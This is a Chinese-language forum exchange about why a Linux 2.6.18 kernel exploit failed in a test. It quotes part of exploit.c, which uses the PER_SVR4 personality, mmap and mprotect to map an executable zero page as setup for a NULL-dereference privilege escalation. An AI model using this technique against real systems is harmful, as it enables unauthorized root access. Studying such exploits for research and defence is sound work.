- 论坛徽章:
- 36
|
兄弟都有测试环境了, 为什么不试试? 还是在故意考验我呢, 呵呵。 我的理解是在2.6.18系统上你能设置PER_SVR4, 就能映射0地址。
呵呵,不好意思。
我就是测试了,没有成功exploit。
因为觉得理论上可以,所以问一下W.Z.T兄。
设置PER_SVR4之后,exploit.c调用的是mrprotect进行修改内存区的,但是失败了:
if ((personality(0xffffffff)) != PER_SVR4) {
dbgprint("Not equal to PER_SVR4, \n");
mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
dbgprint("first mmap, mem = %p, addr = %x\n", mem, (unsigned long)mem);
if (mem != NULL) {
/* for old kernels with SELinux that don't allow RWX anonymous mappings
luckily they don't have NX support either ;) */
mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
dbgprint("second mmap, mem = %p\n", mem);
if (mem != NULL) {
fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
return 1;
}
}
} else {
ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
if (ret == -1) {
fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
return 1;
}
} |
|